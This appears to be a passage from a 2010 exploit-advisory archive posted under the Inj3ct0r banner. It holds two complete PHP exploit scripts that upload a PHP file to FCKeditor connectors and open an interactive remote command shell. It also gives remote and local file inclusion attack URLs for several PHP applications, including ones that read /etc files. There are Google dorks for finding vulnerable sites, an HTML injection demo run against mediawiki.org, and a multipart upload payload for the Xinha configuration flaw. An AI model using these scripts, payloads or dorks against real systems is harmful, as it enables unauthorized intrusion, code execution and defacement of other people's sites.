[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/

*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;

$connector = "/fckeditor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");

foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";

$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "\r\n";
$data .= "--abcdef--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");

$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;

sleep(1);
}

return false;
}
print "\n+--------------------------------------------------------------------------+";
print "\n| DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit |";
print "\n+--------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /dm-filemanager/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\dm-filemanager-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>

2010/06/04

DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability




1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.ddlcms.com
download: http://www.ddlcms.com/download.php
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

-=[ Vuln Code ]=-

[-] /thanks.php

include(WWWROOT . 'skins/' . $skin . '/header.php'); // line 46
include(WWWROOT . 'leftside.php');

=====================================================================

-=[ P0C ]=-

"skin" parameter in FILE thanks.php is not Defined which can allow remote attackers to execute arbitrary PHP code via a URL

-=[ exploit ]=-

http://127.0.0.1/thanks.php?skin= [inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |=========================

2010/06/01

Mediawiki (index.php) HTML Injection & unknown vulnerability issue




Vendor: www.MEDIAWIKI.ORG
download: http://www.mediawiki.org/wiki/Download
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Thank`s: neogabriel a.k.a Ahmed Yusuf (who have give me inspiration for this exploit)
Dork: "powered by mediawiki" inurl:"index.php?title=" 13,200,000 result (0.18 second)

=====================================================================

Description:

You can read all Description about mediawiki in www.mediawiki.org :P

=====================================================================

-=[ vuln ]=-

http://127.0.0.1/wiki/index.php?title=XSS

-=[ P0C ]=-

http://127.0.0.1/wiki/index.php?title= Hacked by eidelweiss

-=[ vendor Demo P0C ]=-

http://www.mediawiki.org/w/index.php?title= Hacked By eidelweiss

redirect to

http://www.mediawiki.org/wiki/Hacked_by_eidelweiss

Host=www.mediawiki.org
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us,en;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive


Status=Moved Permanently - 301
Date=Tue, 01 Jun 2010 09:11:42 GMT
Server=Apache
Cache-Control=private, s-maxage=0, max-age=0, must-revalidate
Vary=Accept-Encoding,Cookie
Last-Modified=Tue, 01 Jun 2010 09:11:42 GMT
Location=http://www.mediawiki.org/wiki/Hacked_By_eidelweiss
Content-Encoding=gzip
Content-Length=20
Content-Type=text/html; charset=utf-8
X-Cache=MISS from sq75.wikimedia.org, MISS from sq72.wikimedia.org
X-Cache-Lookup=MISS from sq75.wikimedia.org:3128, MISS from sq72.wikimedia.org:80

=========================| -=[ E0F ]=- |=========================

2010/05/30

GR Board v1.8.6.1 stab (theme) Remote File Inclusion Vulnerability





download: http://sirini.net/grboard/board.php?id=grskin&articleNo=82
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

Description:

GRBoard (VERSION 1.8 )is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.

=====================================================================

--=[ Vuln C0de ]=-

[-] path/page.php

-----------------------------------------------------------------------------------------

// 페이지에서 사용할 변수 부르기
$getConfigList = array('theme', 'title', 'logo', 'useOutlogin', 'outlogin', 'usePoll', 'poll');
$countList = count($getConfigList);
for($i=0; $i<$countList; $i++) $config[$getConfigList[$i]] = getVar($getConfigList[$i]);
$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\''));
$content = str_replace($_GET['id'].'|', '', $content['var']);
$path = 'layout/'.$config['theme'];
include 'layout/'.$config['theme'].'/head.page.php'; // <= 1
?>



include 'layout/'.$config['theme'].'/foot.page.php'; // <= 2


?>

-----------------------------------------------------------------------------------------

-=[ P0C ]=-

http://127.0.0.1/path/page.php?theme= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================

2010/05/29

Groone's Simple Contact Form (abspath) RFI Vulnerability




=====================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.groonesworld.com
download: http://www.groonesworld.com/programs/contact/contact.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

Description:

Groone's World Development is a site dedicated to open source development; offering a wide range of mostly free php scripts that will meet your needs.


-=[ Vuln Code ]=-


[-] path/contact/contact.php
-----------------------------------------------------------------------------------

$abspath = "/home/user/public_html/contact/";

/*
This is groones contact form. It's a script that allows people to put a simple contact form on their website
It can be downloaded from http://www.groonesworld.com/
License: GPL

Thank you, Russell H. Bennett, Jr.
*/

include($abspath.'inc/settings.inc.php'); // <= 1

--------

function mailok($usermsg) {
global $abspath;
include($abspath."inc/badwords.inc.php"); // <= 2

$usermsg = strtoupper($usermsg);
$tmpbad = strtoupper($badwords);
$badwords = explode(",",$tmpbad);
$ding = "GOOD";
$i = 0;
-----------------------------------------------------------------------------------

-=[ P0C ]=-

http://127.0.0.1/path/contact/contact.php?abspath= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================

2010/05/26

Flock web browser v2.5.6 (Remote Memory Corrupt) Crash Exploit

======================================================================
Flock web browser v2.5.6 (Remote Memory Corrupt) Crash Exploit
======================================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Save this script with extension .html or .htm
Then open with Your Flock web browser

THIS FOR EDUCATIONAL PURPOSE ONLY
AUTHOR WILL NOT RESPONSIBLE FOR ANY DAMAGE

Vendor: www.flock.com
Download: http://www.flock.com/versions

Tested on WINXP (sp2 - sp3) - WIN 7 - ibook OS X 10.4.11 - Ubuntu 9

Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Greets: [D]eal [c]yber and All Indonesian Hacker`s

-->



2010/05/23

JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability Exploit




-----------------------------------------------------------------------------------
JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability
-----------------------------------------------------------------------------------

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.foldergallery.jv2.net
download: http://foldergallery.jv2.net/Download/
Author: eidelweiss
Thank`s: All Friends & All Hacker`s

-----------------------------------------------------------------------------------

-=[ Vuln Code ]=-

[-] /path/gallery/gallery/popup_slideshow.php

include ("config/gallerysetup.php");
include ("config/galleryconfig.php");
include ("config/file_handling.php");
include ("config/lang/".$language.".php"); // <= 1
include ("theme/".$gallerytheme."/config.php"); // <= 2

-----------------------------------------------------------------------------------

-=[ P0C ]=-

http://127.0.0.1/path/gallery/popup_slideshow.php?language= [LFI]

http://127.0.0.1/path/gallery/popup_slideshow.php?gallerytheme= [LFI]

http://127.0.0.1/path/gallery/popup_slideshow.php?gallerytheme= [inj3ct0r shell]

=========================| -=[ E0F ]=- |=========================

2010/05/22

hustoj (fckeditor) Remote Arbitrary File Upload Exploit




-----------------------------------------------------------------
hustoj (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Hustoj is HUST ACM OnlineJudge with GNU/GPL v2 License
Download : http://code.google.com/p/hustoj/downloads/list
exploited by ..: eidelweiss (g1xsystem@windowslive.com)
Special thanks to : all friends & all Hacker`s

nb to: Sn!pEr.S!Te Hacker => check this out bro => http://www.hack0wn.com/view.php?xroot=1267.0&cat=exploits

details..: works with an Apache server with the mod_mime module installed (if specific)

[-] vulnerable code in path/web/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/upload/'.date("Ym")."/" ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/

*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;

$connector = "/web/fckeditor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");

foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";

$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "\r\n";
$data .= "--abcdef--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");

$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;

sleep(1);
}

return false;
}
print "\n+-----------------------------------------------------------------+";
print "\n| hustoj (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+-----------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /hustoj/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\hustoj-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>

2010/05/13

Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability




========================================================================
Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability
========================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Download: http://sourceforge.net/projects/aardvertiser/files/

Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
Greetz: all inj3ctor Team, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s

========================================================================

-=[Descripttion]=-

A Joomla 1.5 component for advertising items in a 'classified ads' style on a Joomla site complete with extra modules and plugins for improved functionality.


-=[Dork]=-

inurl:/index.php?option=com_aardvertiser

-=[Exploit]=-

http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task= [lfi]
http://localhost/index.php?option=com_aardvertiser&task= [lfi]

-=[LFI]=-

/etc/vsftpd.chroot_list
/usr/local/etc/apache/vhosts.conf

-=[ P0C ]=-

http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task=/usr/local/etc/apache/vhosts.conf
http://localhost/index.php?option=com_aardvertiser&task=/etc/vsftpd.chroot_list

=========================| -=[ E0F ]=- |=================================

migascms "Xinha" Plugin Configuration Injection Vulnerability




================================================
migascms "Xinha" Plugin Configuration Injection Vulnerability
================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Download: http://www.sebrac.webcindario.com/cms/index.php?mode=downloads
Affected: MigasCMS 1.0.0
Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Credits: Stefan Esser
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS (Hack0wn) , exploit-db team , [D]eal [C]yber
Greetz: Stefan Esser, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s

========================================================================

Description:

During an audit of the Xinha WYSIWYG editor it was discovered that it contains a major security hole that allows injecting arbitrary configuration into the editor’s plugins.
These plugins can usually be used from everyone without being logged into the application Xinha uses.
By injecting an attacker defined configuration into the ImageManager plugin it is possible to upload arbitrary files to any directory on the webserver that is writable.
Often sich allows uploading malicious PHP files (e.g. c99) into the document root directory. MigasCMS is one of application that affected with this type of vulnerablity.

The vulnerability is caused by a logical error in the dynamic configuration feature of the Xinha editor.
The editor allows PHP scripts to pass a new configuration to the plugins through the request variables.
The configuration is secured by a salted SHA1 hash with the secret salt being stored in the user session.
However due to a logical error in the verification an attacker can force the verification to use a secret salt known to him.
This allows to inject arbitrary configurations

========================================================================

-=[ VULN C0de ]=-

The vulnerability it is necessary to take a look into the config.inc.php file of the ImageManager Plugin:

[-] path/cms/admin/xinha/plugins/ImageManager/config.inc.php

************************************************************************/
292. // Standard PHP Backend Data Passing
293. // if data was passed using xinha_pass_to_php_backend() we merge the items
294. // provided into the Config
295. require_once(realpath(dirname(__FILE__) . '/../../contrib/php-xinha.php'));
296. if($passed_data = xinha_read_passed_data())
297. {
298. $IMConfig = array_merge($IMConfig, $passed_data);
299. $IMConfig['backend_url'] .= xinha_passed_data_querystring() . '&';
300. }
301. // Deprecated config passing, don't use this way any more!
302. elseif(isset($_REQUEST['backend_config']))
303. {
304. if(get_magic_quotes_gpc()) {
305. $_REQUEST['backend_config'] = stripslashes($_REQUEST['backend_config']);
306. }
307.
308. // Config specified from front end, check that it's valid
309. session_start();
310. $secret = $_SESSION[$_REQUEST['backend_config_secret_key_location']];
311.
312. if($_REQUEST['backend_config_hash'] !== sha1($_REQUEST['backend_config'] . $secret))
313. {
314. die("Backend security error.");
315. }
316.
317. $to_merge = unserialize($_REQUEST['backend_config']);
318. if(!is_array($to_merge))
319. {
320. die("Backend config syntax error.");
321. }
322.
323. $IMConfig = array_merge($IMConfig, $to_merge);
************************************************************************/

An attacker can control the name of session, which is usually PHPSESSID.
He can control the session variable used through the backend_data[key_location] variable and he controls the data and the hash.
The only difference here is that the choosen session variable must exist, but this is not a problem in most applications, as explained above.

========================================================================

-=[ P0C exploitation ]=-

************************************************************************/
Content-Length: 735

----------789665048
Content-Disposition: form-data; name="__plugin"

ImageManager
----------789665048
Content-Disposition: form-data; name="__function"

images
----------789665048
Content-Disposition: form-data; name="dir"

/
----------789665048
Content-Disposition: form-data; name="backend_config"

a:4:{s:10:"images_dir";s:17:"../../../uploads/";s:12:"allow_upload";b:1;s:13:"allow_new_dir";b:1;s:15:"validate_images";b:0;}
----------789665048
Content-Disposition: form-data; name="backend_config_hash"

7c4d33785daa5c2370201ffa236b427aa37c9996
----------789665048
Content-Disposition: form-data; name="backend_config_secret_key_location"

exploitdummy
----------789665048
Content-Disposition: form-data; name="upload"; filename="xXx.php";
Content-Type: xXx


----------789665048

----------789665048
************************************************************************/

Even if the webserver does not have writable directories this vulnerability is critical because by overwriting the plugin configuration it is possible to also trigger other problems like remote URL inclusions.

=========================| -=[ E0F ]=- |=================================

2010/05/08

Moodle 1.9.8+ ("libdir" , "dirroot") RFI Vulnerability Exploit




########################################################

[+]Title: Moodle 1.9.8+ ("libdir" , "dirroot") RFI Vulnerability
[+]Method: Remote (rfi) exploit
[+]Download: http://download.moodle.org/stable19/
[+]Discovered by: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com

[!]Thank`s To: exploit-db team , JosS (hack0wn) , sp3x (securityreason) , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber and all my friends

########################################################

BACKGROUND :

Moodle is a Course Management System (CMS), also known as a Learning Management System (LMS) or a Virtual Learning Environment (VLE).
It is a Free web application that educators can use to create effective online learning sites.

***********************

-=[Vulnerability Description]=-

Moodle v.1.9.8+ is Prone to Remote File Include exploit.

Input passed to the "libdir" and "dirroot" parameter in multiple files is not properly verified before being used to include files.
This can be exploited to execute arbitrary PHP code by including files from local or external resources (rfi) and also can be exploited to disclose full user names of other users (lfi).

Access Vector: Network exploitable
Access Complexity: High
Authentication: Not Required to exploit
Impact Type:Allows unauthorized disclosure of information

Remote: Yes
Local: Yes

-=[ Vulnerable / Affected ]=-

Moodle moodle 1.9.8+
Moodle moodle 1.9.x
Moodle moodle 1.8.x
Moodle moodle 1.7.7 and Prior
Moodle moodle 1.5.2 and Prior
Moodle moodle 1.4.3 and Prior
Moodle moodle 1.3.4 and Prior
Moodle moodle 1.2.1 and Prior
Moodle moodle 1.9 and Prior
Moodle moodle 1.7.7+
Moodle moodle 1.7
Moodle moodle 1.6.9+
Moodle moodle 1.6.1 +
Moodle moodle 1.18.2.3
Moodle moodle 1.18.2.2
RedHat Fedora 13
BEA Systems Weblogic Proxy Plugin 1.5.3 +
BEA Systems Weblogic Proxy Plugin 1.5.3
Moodle - Joomla Integration



-=[ Vuln C0de ]=-

1. Input passed to the "libdir" and "dirroot" parameter in multiple files is not properly verified before being used to include files.
This can be exploited to execute arbitrary PHP code by including files from local or external resources (rfi) and also can be exploited to disclose full user names of other users (lfi).

2. No sanitize , not defined and No Login require for :

require_once($CFG->libdir.'/formslib.php');
***?>

(moodle/admin/uploaduser_form.php)
(moodle/admin/uploadpicture_form.php)
(moodle/blog/edit_form.php)
(moodle/course/edit_form.php)
